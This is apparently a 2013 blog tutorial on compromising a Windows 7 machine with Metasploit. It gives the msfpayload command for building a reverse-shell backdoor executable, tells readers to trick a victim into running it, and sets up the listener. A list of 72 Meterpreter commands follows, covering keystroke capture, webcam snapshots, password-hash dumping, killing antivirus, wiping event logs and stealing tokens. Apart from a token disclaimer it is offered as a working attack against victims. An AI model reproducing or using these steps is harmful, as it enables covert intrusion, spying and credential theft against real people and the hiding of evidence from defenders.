Friday, 15 November 2013

Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands

This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!

(After the TEXT format there is the video of this tutorial, and after video there is meterpreter commands)


Requirements:
             1.Kali Linux/Backtrack
             2.Metasploit Framework

Steps:
      1.Open Terminal and type " service postgresql start && service metasploit start " (without quotation)









2.Now we need to create a payload for the machine
command for creating a payload 

msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 x > /root/backdoor.exe '




okay here after LHOST=enter your ip (to get your ip open terminal and type ifconfig and get the ip )


3.Use your social engineering skill to run the payload in the victim machine.


4.After you are successfully complete step 3 


5.Open the terminal and type  " service postgresql start && service metasploit start "   (without quotation)


6.And type ' msfconsole '


and then type the following 


use exploit/multi/handler (press enter)

set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the ip you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
      



Once you successfully compromised it will be like the following



      

Video: 





                                                          Meterpreter Commands:
                      1. sysinfo -----> shows the system build x86 or x64, language version, build...etc

2. run checkvm    ------>  checks to see if the victim is running a Virtual Machine or native.


3. route   --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc


4. run get_application_list  -------> This shows you applications installed on the remotye PC


5. uictl  --------->  Control Some of the User Interface Compon­ents


6. idletime ----->  shows how long the victim has not been active on the computer.


7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.


8. getuid -------> This will show you the system identity and show you who you are running as such as system.


9. ps ------> This shows all the processes running on the victim as well as the PID's


10. run get_env -------> This willl give you a lot of info on the system


11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.


12. ? ------> Shows a list of different commands.


13. getsystem -----> attempts give you local system privelages


14. reboot ------> Reboot the remote machine


15. sc config process_name start= disabled  --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.


16. clearev -------> Wipes all event logs.


17. execute -f cmd.exe -H -c  ------>  Open a command prompt on a hidden channel.


18. interact 1  ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.


19. download  -------> This command will download the specified command.  "Example"    download c:\\boot.ini


20. upload --------> upload files to the victim machine


21. portfwd ------> forward a local port to a remote service


22. run getgui -e  ------> this will enable remote desktop on the victim.


23. run gettelnet –e  -------> To enable telnet on remote machine.


24. run getcountermeasure  ------>  checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc


25. run killav  ------->   it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.


26. run get_local_subnets  ------>  used to get the local subnet of the victim machine.


27. run hostedit  ------->  allows the attacker to add entries to the Windows host file.  As a result of Windows checking the hosts file first, we can divert traffic to a fake entry


28. run remotewinenum  -------> designed to enumerate the target system with the wmic command


30. run winenum ------->  used for system enumeration.  It will dump tokens, hashes, and issue both net and wmic commands


31. run scraper  -------->  used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”


32. migrate  --------> Migrate to Another Process such as explorer.exe so you don't loose your session.


33. cat  ------->  Read the Contents of a File to the Screen


34. background  "or ctrl + z"  -------->  Back­ground the Current Session


35. irb -------> Drop into irb Scripting Mode


36. interact  --------> Interact with a Channel


37. load ------> Load One or More Meterp­reter Extensions.


38. channel  -------> Displays Info About Active Channels


39. bgkill  --------->  Kill a Background Meterp­reter Script


40. close  -------->  Close a Channel


41. enumdesktops  -------->  List All Accessible Desktops and Window Stations


42. getdesktop  ------->  Get the Current Meterp­reter Desktop


43. lpwd  -------->  Print Local Working Directory


44. ls  -------->  list Files


45. rm  -------->  Delete the Specified File


46. search  -------->  Search for Files.


47. upload  ------>  Upload File to Target


48. keyscan_start  -------->  Start Capturing Keystrokes


49. keyscan_stop Stop Capturing Keystrokes


49. keyscan_dump  -------->   Dump the Keystroke Buffer


50. screenshot  -------->   Scre­enshot of the GUI


51. setdesktop  --------->  Change the Meterp­reters Current Desktop.


52. getprivs  --------->  Attempt to Enable All Privileges Available to the Current Process


53. kill -------->  Terminate a Process    "Example"   kill 1834


54. reboot  -------->  Reboots the Remote Computer


55. reg  --------->  Interact with the Remote Registry.


56. rev2self  --------->  Calls Revert­ToS­elf() on the Remote Machine


57. shell  --------> Drop into a system shell.


58. shutdown  -------->  Shuts Down the Remote Computer


59. steal_token  ------>  Attempt to Steal an Impersonation Token from the Process


60. webcam_list  -------->  List webcams


61. webcam_snap  ------->  Take a snapshot from the specified webcam.


62. hashdump  -------->  Dumps the content of the SAM Database.


63. timestomp  ------->  Manipulates MACE Attributes


64. execute  ------> Execute a command.


65. info  -------->  Display info about active post module.


66. quit  -------->  Terminate the meterpreter session.


67. getwd  ------->  Print Working Directory


68. mkdir  ------->  make directory.


69. pwd  -------> print working directory.


70. drop_token  ------->  Relinquishes Any Active Impersonation Token


71. rmdir  --------> remove directory.



72. del  -------> delete file "exmple"  del passwords.txt

2 comments:

  1. We will be getting a reverse TCP connection from the victim machine by using a small backdoor windows 7 exploit metasploit.

    ReplyDelete
  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ReplyDelete